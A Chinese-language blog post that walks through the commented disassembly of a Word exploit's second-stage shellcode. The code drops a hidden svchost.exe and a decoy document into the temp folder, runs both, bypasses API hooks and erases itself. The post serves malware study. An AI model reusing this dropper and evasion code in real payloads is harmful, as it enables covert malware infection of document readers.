Word溢出Shellcode分析


    前段时间从朋友处拿到一个Word的溢出样本,看了下,应该是很老的漏洞了,Office2003不打补丁时有效,打了SP补丁就无效。本身我对这方面研究得不太多,就分析分析当学习。

Word溢出Shellcode分析

    这里不讲溢出的原因、构造什么的,只分析它的Shellcode。它的Shellcode也是分两段的,重点功能在第二段上,里面用到了不少不错的想法,它有以下特点:

    1。在Kernel32 模块中查找API用了HASH法,方便并可缩小shellcode体积。

    2。里面有一段根据文件大小获得文件句柄的算法很巧妙。

    3。Shellcode调用CreateFileA、WinExec时考虑到了这些函数可能被Hook,因此从函数开头第5字节开始执行。

    // Stage-2 entry (07fe6000). Register roles, as established by the code that follows:
    //   esi = base of a 0x560-byte stack frame: API slots at [esi+8..40h], file handles at
    //         [esi+44h]/[esi+48h], string buffers at [esi+4Ch], [esi+254h], [esi+358h], [esi+45Ch]
    //   edi = parameter block left by stage 1; fields read later: [edi] base address, [edi+4] name
    //         string, [edi+8]/[edi+0Ch] PE image and size, [edi+10h]/[edi+14h] document bytes and
    //         size, [edi+18h] name length (layout inferred from use, not declared anywhere visible)
    //   ebp = caller's frame pointer; reloaded with TerminateProcess at 07fe628f before the hand-off
    07fe6000 55             push   ebp

    07fe6001 8bec           mov    ebp,esp

    07fe6003 81ec60050000   sub    esp,560h          // scratch frame

    07fe6009 8bf4           mov    esi,esp           // esi = frame base

    07fe600b e8d8020000     call   07fe62e8          // PEB walk (07fe62e8): eax/ebx = two module bases

    07fe6010 8906           mov    dword ptr [esi],eax //7c800000 (kernel32 base in the author's run)

    07fe6012 895e04         mov    dword ptr [esi+4],ebx // second base: first in-init-order module (ntdll) on the NT path, 0 on the other path
    // Import resolution by hash: each call is lookup(hash, base) -> eax, where eax is 0 when no
    // export name matched; the results are stored without any check. Hash = ROR13 over the name
    // bytes (see 07fe631b). Slot layout: +8 CreateFileA, +0Ch WriteFile, +10h CloseHandle,
    // +14h WinExec, +24h TerminateProcess, +28h GetTempPathA, +2Ch lstrlenA, +30h lstrcpyA,
    // +34h lstrcatA, +38h WideCharToMultiByte, +40h ZwQueryVirtualMemory.
    07fe6015 ff36           push   dword ptr [esi]   // arg2: module base (kernel32)

    07fe6017 68a517007c     push   7C0017A5h         // arg1: name hash

    07fe601c e8fa020000     call   07fe631b

    07fe6021 894608         mov    dword ptr [esi+8],eax//CreateFileA

    07fe6024 ff36           push   dword ptr [esi]

    07fe6026 681f790ae8     push   0E80A791Fh

    07fe602b e8eb020000     call   07fe631b

    07fe6030 89460c         mov    dword ptr [esi+0Ch],eax//WriteFile

    07fe6033 ff36           push   dword ptr [esi]

    07fe6035 68fb97fd0f     push   0FFD97FBh

    07fe603a e8dc020000     call   07fe631b

    07fe603f 894610         mov    dword ptr [esi+10h],eax//CloseHandle

    07fe6042 ff36           push   dword ptr [esi]

    07fe6044 6898fe8a0e     push   0E8AFE98h

    07fe6049 e8cd020000     call   07fe631b

    07fe604e 894614         mov    dword ptr [esi+14h],eax//WinExec

    07fe6051 ff36           push   dword ptr [esi]

    07fe6053 683b4743dd     push   0DD43473Bh

    07fe6058 e8be020000     call   07fe631b

    07fe605d 89462c         mov    dword ptr [esi+2Ch],eax//lstrlenA

    07fe6060 ff36           push   dword ptr [esi]

    07fe6062 68fb499bcb     push   0CB9B49FBh

    07fe6067 e8af020000     call   07fe631b

    07fe606c 894630         mov    dword ptr [esi+30h],eax//lstrcpyA

    07fe606f ff36           push   dword ptr [esi]

    07fe6071 683b4673cb     push   0CB73463Bh

    07fe6076 e8a0020000     call   07fe631b

    07fe607b 894634         mov    dword ptr [esi+34h],eax//lstrcatA

    07fe607e ff36           push   dword ptr [esi]

    07fe6080 6883b9b578     push   78B5B983h

    07fe6085 e891020000     call   07fe631b

    07fe608a 894624         mov    dword ptr [esi+24h],eax//TerminateProcess

    07fe608d ff36           push   dword ptr [esi]

    07fe608f 6833ca8a5b     push   5B8ACA33h

    07fe6094 e882020000     call   07fe631b

    07fe6099 894628         mov    dword ptr [esi+28h],eax//GetTempPathA

    07fe609c ff36           push   dword ptr [esi]

    07fe609e 68f94a63c1     push   0C1634AF9h

    07fe60a3 e873020000     call   07fe631b

    07fe60a8 894638         mov    dword ptr [esi+38h],eax//WideCharToMultiByte

    07fe60ab 837e0400       cmp    dword ptr [esi+4],0 // no second module base (non-NT path of 07fe62e8)?

    07fe60af 0f842b020000   je     07fe62e0            // -> give up via the TerminateProcess stub

    07fe60b5 ff7604         push   dword ptr [esi+4]   // this lookup is done in the second module (ntdll). NOTE: esp == esi+4 here, because 07fe62e8 returns with "ret 4" although its caller pushed no argument, so this push overwrites the [esi] slot; [esi] is not read again after this point

    07fe60b8 68929cd34f     push   4FD39C92h

    07fe60bd e859020000     call   07fe631b

    07fe60c2 894640         mov    dword ptr [esi+40h],eax//ZwQueryVirtualMemory

    // Recover the on-disk path of the document this code runs from:
    //   ZwQueryVirtualMemory(-1, [edi], 2, esi+4Ch, 208h, &ReturnLength)
    // Class 2 is MemorySectionName, which yields the mapped file's name as a UNICODE_STRING
    // followed inline by its characters.
    07fe60c5 54             push   esp               // ReturnLength -> the stack itself (esp == esi+4 here)

    07fe60c6 6808020000     push   208h              // MemoryInformationLength

    07fe60cb 8d464c         lea    eax,[esi+4Ch]

    07fe60ce 50             push   eax               // MemoryInformation buffer at esi+4Ch

    07fe60cf 6a02           push   2                 // MemoryInformationClass = MemorySectionName

    07fe60d1 ff37           push   dword ptr [edi]   // BaseAddress: the address stage 1 recorded (also the copy target at 07fe6295)

    07fe60d3 6aff           push   0FFFFFFFFh        // ProcessHandle: current process

    07fe60d5 ff5640         call   dword ptr [esi+40h]//ZwQueryVirtualMemory

    07fe60d8 8bc4           mov    eax,esp           // dead store: eax is reloaded at 07fe60ef before any use
    // WideCharToMultiByte(CP_ACP, 0, esi+54h, 1F0h, esi+45Ch, 0FFh, 0, 0): ANSI path -> esi+45Ch
    07fe60da 6a00           push   0                 // lpUsedDefaultChar

    07fe60dc 6a00           push   0                 // lpDefaultChar

    07fe60de 68ff000000     push   0FFh              // cbMultiByte: output capped at 255 bytes

    07fe60e3 8d9e5c040000   lea    ebx,[esi+45Ch]

    07fe60e9 53             push   ebx               // lpMultiByteStr

    07fe60ea 68f0010000     push   1F0h              // cchWideChar: fixed 1F0h chars rather than the returned Length; NOTE(review) this exceeds the 208h-byte query buffer, so it relies on the embedded NUL / the 0FFh output cap

    07fe60ef 8d464c         lea    eax,[esi+4Ch]

    07fe60f2 83c008         add    eax,8             // skip the 8-byte UNICODE_STRING header; the name characters follow it

    07fe60f5 50             push   eax               // lpWideCharStr

    07fe60f6 6a00           push   0                 // dwFlags

    07fe60f8 6a00           push   0                 // CodePage = CP_ACP

    07fe60fa ff5638         call   dword ptr [esi+38h]//WideCharToMultiByte
    // GetTempPathA(0FFh, esi+358h): temp directory (with trailing '\', per the path at 07fe6193) -> esi+358h
    07fe60fd 8d9e58030000   lea    ebx,[esi+358h]

    07fe6103 53             push   ebx               // lpBuffer

    07fe6104 68ff000000     push   0FFh              // nBufferLength

    07fe6109 ff5628         call   dword ptr [esi+28h]//GetTempPathA
    // lstrcpyA(esi+254h, esi+358h): second copy of the temp directory -> esi+254h
    07fe610c 8d9658030000   lea    edx,[esi+358h]

    07fe6112 52             push   edx               // source

    07fe6113 8d9654020000   lea    edx,[esi+254h]

    07fe6119 52             push   edx               // destination

    07fe611a ff5630         call   dword ptr [esi+30h]//lstrcpyA
    // Isolate the file-name part of the document path (after its last '\')
    07fe611d 8d965c040000   lea    edx,[esi+45Ch]

    07fe6123 52             push   edx

    07fe6124 ff562c         call   dword ptr [esi+2Ch]//lstrlenA

    07fe6127 8bc8           mov    ecx,eax           // ecx = length of the ANSI document path

    07fe6129 49             dec    ecx

    07fe612a 803c0a5c       cmp    byte ptr [edx+ecx],5Ch // scan backwards for '\'

    07fe612e 75f9           jne    07fe6129          // NOTE: no lower bound; a path without '\' would run ecx below index 0

    07fe6130 41             inc    ecx

    07fe6131 03d1           add    edx,ecx           // edx -> file name after the last '\'
    // lstrcatA(esi+254h, edx): esi+254h = <temp>\<original document name>
    07fe6133 52             push   edx

    07fe6134 8d9654020000   lea    edx,[esi+254h]

    07fe613a 52             push   edx

    07fe613b ff5634         call   dword ptr [esi+34h]//lstrcatA
    // lstrcpyA(esi+4Ch, esi+358h): esi+4Ch = <temp>\ (the section-name buffer is reused here)
    07fe613e 8d9658030000   lea    edx,[esi+358h]

    07fe6144 52             push   edx

    07fe6145 8d564c         lea    edx,[esi+4Ch]

    07fe6148 52             push   edx

    07fe6149 ff5630         call   dword ptr [esi+30h]//lstrcpyA
    // lstrcatA(esi+358h, [edi+4]): esi+358h = <temp>\svchost.exe
    07fe614c ff7704         push   dword ptr [edi+4]//svchost.exe

    07fe614f 8d9658030000   lea    edx,[esi+358h]

    07fe6155 52             push   edx

    07fe6156 ff5634         call   dword ptr [esi+34h]//lstrcatA

    07fe6159 8b5704         mov    edx,dword ptr [edi+4]//svchost.exe

    07fe615c 8b4718         mov    eax,dword ptr [edi+18h]//strlen(svchost.exe)=b

    07fe615f c6040200       mov    byte ptr [edx+eax],0 // 0-terminate the name at its length. NOTE: this happens after the lstrcatA at 07fe6156 already consumed the string; whether it was terminated before cannot be seen here
    // lstrcatA(esi+4Ch, [edi+4]): esi+4Ch = <temp>\svchost.exe (this is the copy used for CreateFileA)
    07fe6163 ff7704         push   dword ptr [edi+4]//svchost.exe

    07fe6166 8d564c         lea    edx,[esi+4Ch]

    07fe6169 52             push   edx

    07fe616a ff5634         call   dword ptr [esi+34h]//lstrcatA

    // Drop 1: write the embedded PE ([edi+8], [edi+0Ch] bytes) to <temp>\svchost.exe
    07fe616d 8d464c         lea    eax,[esi+4Ch]     // eax = path argument for the wrapper at 07fe6299

    07fe6170 e824010000     call   07fe6299          // CreateFileA via the prologue-skipping wrapper; eax = handle

    07fe6175 894648         mov    dword ptr [esi+48h],eax // handle of the dropped executable

    07fe6178 8b5708         mov    edx,dword ptr [edi+8] // embedded PE image

    07fe617b 8a02           mov    al,byte ptr [edx]        // the image's first two bytes are stored swapped;

    07fe617d 8a6201         mov    ah,byte ptr [edx+1]      // swap them back in place before writing

    07fe6180 8822           mov    byte ptr [edx],ah

    07fe6182 884201         mov    byte ptr [edx+1],al
    // WriteFile([esi+48h], edx, [edi+0Ch], &written, 0)
    07fe6185 54             push   esp               // reserve one dword on the stack for lpNumberOfBytesWritten

    07fe6186 8d0424         lea    eax,[esp]         // eax -> that dword

    07fe6189 6a00           push   0                 // lpOverlapped

    07fe618b 50             push   eax               // lpNumberOfBytesWritten

    07fe618c ff770c         push   dword ptr [edi+0Ch] //0000524c = size of the PE (author's run)

    07fe618f 52             push   edx                //07fe637e = PE bytes (author's run)

    07fe6190 ff7648         push   dword ptr [esi+48h]

    07fe6193 ff560c         call   dword ptr [esi+0Ch] //Write \DOCUME~1\LANGOU~1\LOCALS~1\Temp\svchost.exe

    07fe6196 5b             pop    ebx               // discard the bytes-written dword
    // Drop 2: write the real document ([edi+10h], [edi+14h] bytes) to <temp>\<original name>
    07fe6197 8d8654020000   lea    eax,[esi+254h]

    07fe619d e8f7000000     call   07fe6299          // CreateFileA via the prologue-skipping wrapper; eax = handle

    07fe61a2 894644         mov    dword ptr [esi+44h],eax // handle of the restored document

    07fe61a5 8b5710         mov    edx,dword ptr [edi+10h]// real Word document; its first two 16-bit words are stored byte-rotated

    07fe61a8 668b02         mov    ax,word ptr [edx]

    07fe61ab 66c1c008       rol    ax,8              // swap the two bytes of word 0

    07fe61af 668902         mov    word ptr [edx],ax

    07fe61b2 668b4202       mov    ax,word ptr [edx+2]

    07fe61b6 66c1c008       rol    ax,8              // swap the two bytes of word 1

    07fe61ba 66894202       mov    word ptr [edx+2],ax
    // WriteFile([esi+44h], [edi+10h], [edi+14h], &written, 0)
    07fe61be 54             push   esp               // reserve lpNumberOfBytesWritten

    07fe61bf 8d0424         lea    eax,[esp]

    07fe61c2 6a00           push   0                 // lpOverlapped

    07fe61c4 50             push   eax               // lpNumberOfBytesWritten

    07fe61c5 ff7714         push   dword ptr [edi+14h] // document size

    07fe61c8 ff7710         push   dword ptr [edi+10h] // document bytes

    07fe61cb ff7644         push   dword ptr [esi+44h]

    07fe61ce ff560c         call   dword ptr [esi+0Ch]//WriteFile: write the real document

    07fe61d1 5b             pop    ebx               // discard the bytes-written dword

    07fe61d2 ff7648         push   dword ptr [esi+48h]

    07fe61d5 ff5610         call   dword ptr [esi+10h]//CloseHandle (dropped executable)

    07fe61d8 ff7644         push   dword ptr [esi+44h]

    07fe61db ff5610         call   dword ptr [esi+10h]//CloseHandle (restored document)

    // Build the command line in place, in front of the document path at esi+254h:
    //   cmd.exe /c start winword.exe /w /q "<temp>\<original name>"
    // The nine dword stores below spell the 36-byte prefix from esi+230h upward; each constant's
    // ASCII is given in its comment (little-endian byte order).
    07fe61de 8d9e54020000   lea    ebx,[esi+254h]

    07fe61e4 53             push   ebx

    07fe61e5 ff562c         call   dword ptr [esi+2Ch]//lstrlenA

    07fe61e8 c6040322       mov    byte ptr [ebx+eax],22h   // append the closing '"'

    07fe61ec c644030100     mov    byte ptr [ebx+eax+1],0   // and the terminator

    07fe61f1 83eb24         sub    ebx,24h                  // ebx = esi+230h, 36 bytes before the path

    07fe61f4 3ec743202f712022 mov    dword ptr ds:[ebx+20h],2220712Fh // "/q \""

    07fe61fc 3ec7431c202f7720 mov    dword ptr ds:[ebx+1Ch],20772F20h // " /w "

    07fe6204 3ec743182e657865 mov    dword ptr ds:[ebx+18h],6578652Eh // ".exe"

    07fe620c 3ec74314776f7264 mov    dword ptr ds:[ebx+14h],64726F77h // "word"

    07fe6214 3ec743102077696e mov    dword ptr ds:[ebx+10h],6E697720h // " win"

    07fe621c 3ec7430c74617274 mov    dword ptr ds:[ebx+0Ch],74726174h // "tart"

    07fe6224 3ec743082f632073 mov    dword ptr ds:[ebx+8],7320632Fh   // "/c s"

    07fe622c 3ec7430465786520 mov    dword ptr ds:[ebx+4],20657865h   // "exe "

    07fe6234 3ec703636d642e mov    dword ptr ds:[ebx],2E646D63h       // "cmd."

    07fe623b e885000000     call   07fe62c5// WinExec(ebx, SW_HIDE) via the prologue-skipping wrapper: opens the restored document in Word

    07fe6240 8d9e58030000   lea    ebx,[esi+358h]  // "<temp>\svchost.exe"

    07fe6246 e87a000000     call   07fe62c5// WinExec via the wrapper: runs the dropped executable

    // Hand-off: copy the 60h-byte tail at 07fe6271 onto the stack, set up registers at 07fe627f,
    // then "jmp esp" into the copy. Running from the stack lets the tail overwrite and zero the
    // memory the shellcode itself came from before terminating the process.
    07fe624b b960000000     mov    ecx,60h           // bytes to relocate

    07fe6250 2be1           sub    esp,ecx           // reserve 60h bytes of stack for the copy

    07fe6252 8bd7           mov    edx,edi           // stash parameter-block pointer

    07fe6254 8bde           mov    ebx,esi           // stash frame pointer

    07fe6256 54             push   esp

    07fe6257 5f             pop    edi               // edi = destination (the reserved stack area)

    07fe6258 e80a000000     call   07fe6267          // eax = 07fe6271, the address of the tail (call/pop trick below)

    07fe625d 8bf0           mov    esi,eax

    07fe625f f3a4           rep movs byte ptr es:[edi],byte ptr [esi] // copy the tail (DF is clear: cld at 07fe6344)

    07fe6261 8bfa           mov    edi,edx           // restore

    07fe6263 8bf3           mov    esi,ebx

    07fe6265 eb18           jmp    07fe627f          // set up and enter the copy; the document is restored and the process exits there
    // Helper: returns eax = own address + 5 = 07fe6271
    07fe6267 e800000000     call   07fe626c          // pushes 07fe626c

    07fe626c 58             pop    eax

    07fe626d 83c005         add    eax,5

    07fe6270 c3             ret
    // Tail (executed from the stack copy). On entry (see 07fe627f): ecx = document size,
    // esi = document bytes, edi = [edi] from the parameter block, ebx = byte distance between
    // the two, ebp = TerminateProcess.
    07fe6271 f3a4           rep movs byte ptr es:[edi],byte ptr [esi] // overwrite the region at [edi] (presumably where the exploit document is mapped — it is the address queried at 07fe60d1) with the real document

    07fe6273 33c0           xor    eax,eax

    07fe6275 8bcb           mov    ecx,ebx

    07fe6277 f3aa           rep stos byte ptr es:[edi] // zero the following ebx bytes, which covers this code's original location

    07fe6279 6a00           push   0                 // uExitCode

    07fe627b 6aff           push   0FFFFFFFFh        // hProcess = current process

    07fe627d ffd5           call   ebp               // TerminateProcess
    // Register set-up for the tail, then jump into the stack copy
    07fe627f 8b4f14         mov    ecx,dword ptr [edi+14h] // document size

    07fe6282 8b07           mov    eax,dword ptr [edi]

    07fe6284 8bd0           mov    edx,eax

    07fe6286 03d1           add    edx,ecx           // edx = [edi] + size

    07fe6288 8b5f10         mov    ebx,dword ptr [edi+10h]

    07fe628b 03d9           add    ebx,ecx           // ebx = [edi+10h] + size

    07fe628d 2bda           sub    ebx,edx           // ebx = [edi+10h] - [edi] (the size terms cancel)

    07fe628f 8b6e24         mov    ebp,dword ptr [esi+24h]//TerminateProcess

    07fe6292 8b7710         mov    esi,dword ptr [edi+10h] // copy source: real document

    07fe6295 8b3f           mov    edi,dword ptr [edi]     // copy destination

    07fe6297 ffe4           jmp    esp               // esp still points at the relocated tail

    // CreateFileA wrapper. In: eax = path. Out: eax = handle (CreateFileA's own "ret" returns
    // to this wrapper's caller, whose return address is re-pushed below).
    //   CreateFileA(eax, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ, 0, OPEN_ALWAYS,
    //               FILE_ATTRIBUTE_NORMAL, 0)
    // The API is entered at +5 or +6 instead of its first byte; the prologue bytes skipped that
    // way (push ebp / mov ebp,esp [/ push [ebp+8]]) are replayed here. Note OPEN_ALWAYS does
    // not truncate an existing file.
    07fe6299 59             pop    ecx               // ecx = return address into the caller

    07fe629a 6a00           push   0                 // hTemplateFile

    07fe629c 6880000000     push   80h               // dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL

    07fe62a1 6a04           push   4                 // dwCreationDisposition = OPEN_ALWAYS

    07fe62a3 6a00           push   0                 // lpSecurityAttributes

    07fe62a5 6a01           push   1                 // dwShareMode = FILE_SHARE_READ

    07fe62a7 68000000c0     push   0C0000000h        // GENERIC_READ|GENERIC_WRITE

    07fe62ac 50             push   eax               // lpFileName

    07fe62ad 8b5608         mov    edx,dword ptr [esi+8]//CreateFileA

    07fe62b0 83c205         add    edx,5             // resume point: 5 bytes into the API

    07fe62b3 803a08         cmp    byte ptr [edx],8  // is byte +5 the trailing 08h of "push [ebp+8]"? (presumably a build whose prologue has no leading mov edi,edi — unverified)

    07fe62b6 51             push   ecx               // return address the API will "ret" to

    07fe62b7 55             push   ebp               // replay: push ebp

    07fe62b8 8bec           mov    ebp,esp           // replay: mov ebp,esp (push/mov leave the flags from the cmp intact)

    07fe62ba 7402           je     07fe62be

    07fe62bc ffe2           jmp    edx               // byte +5 != 08h: resume at API+5

    07fe62be 36ff7508       push   dword ptr ss:[ebp+8] // replay: push [ebp+8] (= lpFileName)

    07fe62c2 42             inc    edx

    07fe62c3 ffe2           jmp    edx               // resume at API+6

    // WinExec wrapper. In: ebx = command line. Calls WinExec(ebx, 0 = SW_HIDE) entered at +5
    // or +6 of the API, replaying the skipped prologue bytes (push ebp / mov ebp,esp
    // [/ sub esp,54h]) the same way the CreateFileA wrapper at 07fe6299 does.
    07fe62c5 59             pop    ecx               // ecx = return address into the caller

    07fe62c6 6a00           push   0                 // uCmdShow = SW_HIDE

    07fe62c8 53             push   ebx               // lpCmdLine

    07fe62c9 8b5614         mov    edx,dword ptr [esi+14h]//WinExec

    07fe62cc 83c205         add    edx,5             // resume point: 5 bytes into the API

    07fe62cf 51             push   ecx               // return address the API will "ret" to

    07fe62d0 55             push   ebp               // replay: push ebp

    07fe62d1 8bec           mov    ebp,esp           // replay: mov ebp,esp

    07fe62d3 803a54         cmp    byte ptr [edx],54h // is byte +5 the 54h immediate of "sub esp,54h"?

    07fe62d6 7402           je     07fe62da

    07fe62d8 ffe2           jmp    edx               // no: resume at API+5

    07fe62da 83ec54         sub    esp,54h           // replay: sub esp,54h

    07fe62dd 42             inc    edx

    07fe62de ffe2           jmp    edx               // resume at API+6

    // Bail-out stub (reached from 07fe60af when no second module base was found):
    // TerminateProcess(-1, 0). The trailing ret is unreachable if the call succeeds.
    07fe62e0 6a00           push   0                 // uExitCode

    07fe62e2 6aff           push   0FFFFFFFFh        // hProcess = current process

    07fe62e4 ff5624         call   dword ptr [esi+24h]//TerminateProcess

    07fe62e7 c3             ret

    // Module-base locator. Out: eax = base of the second module in the loader's
    // InInitializationOrder list (kernel32 in the author's run, see 07fe6010), ebx = base of
    // the first one (ntdll — confirmed by its use to resolve ZwQueryVirtualMemory at 07fe60b5).
    // Walks fs:[30h] (PEB) -> +0Ch (Ldr) -> +1Ch (InInitializationOrderModuleList), reading each
    // entry's DllBase at +8. Clobbers ebx. NOTE: returns with "ret 4" although the caller at
    // 07fe600b pushes no argument, so the caller's esp ends up 4 bytes higher than before the call.
    07fe62e8 55             push   ebp

    07fe62e9 56             push   esi

    07fe62ea 64a130000000   mov    eax,dword ptr fs:[00000030h] // eax = PEB

    07fe62f0 85c0           test   eax,eax

    07fe62f2 7813           js     07fe6307          // sign bit set: take the alternate layout below (presumably a non-NT path — unverified)

    07fe62f4 3e8b400c       mov    eax,dword ptr ds:[eax+0Ch] // PEB.Ldr

    07fe62f8 3e8b701c       mov    esi,dword ptr ds:[eax+1Ch] // first InInitializationOrder entry

    07fe62fc 3e8b5e08       mov    ebx,dword ptr ds:[esi+8]   // its DllBase (ntdll), returned in ebx

    07fe6300 ad             lods   dword ptr [esi]   // eax = Flink: second entry

    07fe6301 3e8b6808       mov    ebp,dword ptr ds:[eax+8]   // its DllBase (kernel32)

    07fe6305 eb0d           jmp    07fe6314

    07fe6307 3e8b4034       mov    eax,dword ptr ds:[eax+34h] // alternate path: different structure layout

    07fe630b 3e8ba8b8000000 mov    ebp,dword ptr ds:[eax+0B8h]

    07fe6312 33db           xor    ebx,ebx           // no second module on this path; the caller checks for 0 at 07fe60ab

    07fe6314 8bc5           mov    eax,ebp

    07fe6316 5e             pop    esi

    07fe6317 5d             pop    ebp

    07fe6318 c20400         ret    4

    // Export lookup by name hash. Args (stdcall, cleaned by "ret 8"): [esp+14h] = hash,
    // [esp+18h] = module base. Out: eax = export address, or 0 if no name matched; edx = base.
    // Parses the PE export directory (e_lfanew at +3Ch, export RVA at +78h of the optional
    // header; NumberOfNames +18h, AddressOfFunctions +1Ch, AddressOfNames +20h,
    // AddressOfNameOrdinals +24h). Hash: h = ror(h,13) + byte, over the name bytes, starting
    // from 0. Names are scanned from the last toward the first. Also executes cld, which the
    // later "rep movs"/"rep stos" at 07fe625f/07fe6271 depend on.
    07fe631b 53             push   ebx

    07fe631c 55             push   ebp

    07fe631d 56             push   esi

    07fe631e 57             push   edi

    07fe631f 368b6c2418     mov    ebp,dword ptr ss:[esp+18h] // ebp = module base

    07fe6324 368b453c       mov    eax,dword ptr ss:[ebp+3Ch] // e_lfanew

    07fe6328 368b540578     mov    edx,dword ptr ss:[ebp+eax+78h] // export directory RVA

    07fe632d 03d5           add    edx,ebp           // edx = export directory

    07fe632f 3e8b4a18       mov    ecx,dword ptr ds:[edx+18h] // NumberOfNames

    07fe6333 3e8b5a20       mov    ebx,dword ptr ds:[edx+20h] // AddressOfNames RVA

    07fe6337 03dd           add    ebx,ebp

    07fe6339 e338           jecxz  07fe6373          // no names left: not found

    07fe633b 49             dec    ecx               // ecx = index of the name to test

    07fe633c 3e8b348b       mov    esi,dword ptr ds:[ebx+ecx*4]

    07fe6340 03f5           add    esi,ebp           // esi -> name string

    07fe6342 33ff           xor    edi,edi           // edi = running hash

    07fe6344 fc             cld

    07fe6345 33c0           xor    eax,eax           // ah = 0 for the terminator test below

    07fe6347 ac             lods   byte ptr [esi]    // al = next name byte

    07fe6348 3ac4           cmp    al,ah             // end of string?

    07fe634a 7407           je     07fe6353

    07fe634c c1cf0d         ror    edi,0Dh

    07fe634f 03f8           add    edi,eax

    07fe6351 ebf2           jmp    07fe6345

    07fe6353 363b7c2414     cmp    edi,dword ptr ss:[esp+14h] // compare with the requested hash

    07fe6358 75df           jne    07fe6339          // next name (descending)

    07fe635a 3e8b5a24       mov    ebx,dword ptr ds:[edx+24h] // AddressOfNameOrdinals RVA

    07fe635e 03dd           add    ebx,ebp

    07fe6360 663e8b0c4b     mov    cx,word ptr ds:[ebx+ecx*2] // ordinal; only the low 16 bits of ecx are replaced, the upper bits keep the index's (zero for indexes below 10000h)

    07fe6365 3e8b5a1c       mov    ebx,dword ptr ds:[edx+1Ch] // AddressOfFunctions RVA

    07fe6369 03dd           add    ebx,ebp

    07fe636b 3e8b048b       mov    eax,dword ptr ds:[ebx+ecx*4] // function RVA

    07fe636f 03c5           add    eax,ebp           // eax = function address

    07fe6371 eb02           jmp    07fe6375

    07fe6373 33c0           xor    eax,eax           // not found

    07fe6375 8bd5           mov    edx,ebp

    07fe6377 5f             pop    edi

    07fe6378 5e             pop    esi

    07fe6379 5d             pop    ebp

    07fe637a 5b             pop    ebx

    07fe637b c20800         ret    8
